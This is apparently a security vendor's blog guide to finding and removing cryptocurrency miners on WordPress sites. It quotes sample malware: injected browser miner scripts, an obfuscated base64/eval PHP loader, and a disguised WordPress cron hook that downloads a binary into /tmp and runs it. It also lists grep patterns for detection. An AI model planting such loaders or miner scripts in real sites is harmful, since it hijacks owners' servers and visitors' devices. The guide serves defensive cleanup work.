Your WordPress site is suddenly slow. CPU usage is spiked. Your hosting bill went up. But there's no visible malware, no spam, no redirects. The cause? A cryptocurrency miner running silently in the background.
What is cryptojacking?
Cryptojacking is when attackers inject code into your website that uses your server's CPU (or your visitors' browsers) to mine cryptocurrency — typically Monero (XMR), which is designed for CPU mining.
There are two types:
Server-side miners
PHP scripts that run on your hosting server, consuming CPU cycles 24/7. These are the more damaging variant — they can:
- Spike your hosting costs
- Trigger resource limit suspensions
- Degrade site performance for all visitors
Client-side miners
JavaScript injected into your pages that runs in your visitors' browsers. These use your visitors' CPU to mine while they browse your site.
<!-- Typical client-side miner injection -->
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('attacker-site-key');
miner.start();
</script>
While the original Coinhive service shut down in 2019, dozens of copycats exist in 2026.
Signs your site is cryptojacking
- Abnormally high CPU usage — Check your hosting control panel. If PHP processes are consistently at 80-100% CPU with no traffic spike, suspect mining
- Slow page loads — Server response times increase because CPU is saturated
- Hosting provider warnings — Many hosts send automated emails when CPU usage exceeds thresholds
- Unexpected PHP processes — Use
toporhtopon your server to find PHP processes consuming unusual resources - Visitor complaints — For client-side miners, visitors may notice their fans spinning up or battery draining
Where miners hide
Server-side miners are typically found in:
/wp-content/uploads/— disguised as image files with .php extensions/wp-includes/— modified core files with mining code appended/tmp/or/var/tmp/— outside the web root but executed via cron jobs- Plugin directories — fake or abandoned plugins with mining payloads. Miners often use the same obfuscation techniques as other WordPress malware to avoid detection
// Typical obfuscated server-side miner
$a = base64_decode('ZXZhbChnemluZmxhdGUo...');
@eval($a);
Removal steps
1. Identify the mining processes
Check running processes on your server:
ps aux | grep -i php | sort -k3 -rn | head -20
2. Scan with WO Security Shield
Run a full integrity scan from your WO Security Shield dashboard. The scanner detects:
- Known cryptomining signatures (XMRig, Coinhive variants, CryptoLoot)
- Obfuscated eval/base64 patterns common in mining payloads
- Unauthorised files in WordPress core directories
- Modified core files with appended code
3. Remove infected files
Delete any files flagged as cryptominers. For modified core files, use the "Reinstall WordPress Core" button in the findings panel — this replaces all core files with clean copies from WordPress.org.
4. Check cron jobs
Attackers often schedule mining scripts to restart via cron:
crontab -l
Remove any entries you don't recognise, especially those executing PHP files or downloading remote scripts.
5. Find the entry point
The miner didn't install itself. Common entry points:
- Vulnerable plugins (check for known CVEs)
- Weak admin passwords (check login logs) — see our guide on stopping brute-force attacks
- File upload vulnerabilities — attackers may have planted PHP backdoors
- Compromised FTP credentials
Cryptojacking is profitable because it's silent. Attackers prefer it over visible hacks precisely because sites stay infected longer. Regular scans with WO Security Shield catch miners before they cost you money.
How Cryptojacking Works on WordPress Sites
Cryptocurrency mining malware on WordPress sites comes in two forms:
Server-Side Miners
These run directly on your web server, using your CPU and memory to mine cryptocurrency:
// Disguised as a WordPress cron job
if (!wp_next_scheduled('wp_system_maintenance')) {
wp_schedule_event(time(), 'hourly', 'wp_system_maintenance');
}
add_action('wp_system_maintenance', function() {
// Downloads and executes a mining binary
$bin = file_get_contents('https://cdn.example.com/libsystem.so');
file_put_contents('/tmp/.system-cache', $bin);
exec('chmod +x /tmp/.system-cache && /tmp/.system-cache &');
});
Symptoms: Consistently high CPU usage (80-100%), slow page loads, increased hosting costs, hosting provider warnings about resource abuse.
Client-Side Miners (Browser-Based)
These inject JavaScript that mines cryptocurrency using your visitors' browsers:
// Injected into your theme's footer or a compromised plugin
<script src="https://cdn.example.com/lib/worker.min.js"></script>
<script>
var miner = new CoinMiner.Anonymous('attacker-wallet-id');
miner.start({threads: 2, throttle: 0.3});
</script>
Symptoms: Visitors complain about slow browsers, laptop fans spinning up, increased bounce rate, mobile visitors experiencing battery drain.
Detection Methods
Check Server Resource Usage
# Check for suspicious processes
top -bn1 | head -20
# Look for mining processes (common binary names)
ps aux | grep -E '(xmrig|minerd|cryptonight|stratum|kworker)' | grep -v grep
# Check for suspicious cron jobs
crontab -l
ls -la /etc/cron.d/
# Find recently modified PHP files that might be the loader
find /var/www/html -name "*.php" -mtime -7 -exec grep -l "exec\|system\|passthru" {} \;
Check for Injected JavaScript
# Search for known mining scripts
grep -rl "coinhive\|cryptoloot\|coin-hive\|CoinMiner\|minero\.cc" /var/www/html/
# Search for suspicious obfuscated scripts
grep -rl "String.fromCharCode.*eval" /var/www/html/wp-content/
# Check database for injected scripts in posts/pages
wp db query "SELECT ID, post_title FROM wp_posts WHERE post_content LIKE '%<script%miner%'" --allow-root
Monitor Network Connections
# Check for connections to mining pools
netstat -tlnp | grep -E ':(3333|4444|5555|7777|8888|9999)'
# Watch active connections
ss -tp | grep -v 'localhost'
Removal Steps
- Kill the mining process —
kill -9 [PID]for any suspicious process - Remove the loader script — delete the PHP file that downloads/executes the miner
- Clean injected JavaScript — remove mining scripts from theme files and database
- Remove scheduled tasks — check WordPress cron (
wp_options→cron) and system crontab - Delete downloaded binaries — check
/tmp/,/var/tmp/, and/dev/shm/for suspicious executables - Patch the entry point — update the vulnerable plugin or theme that was exploited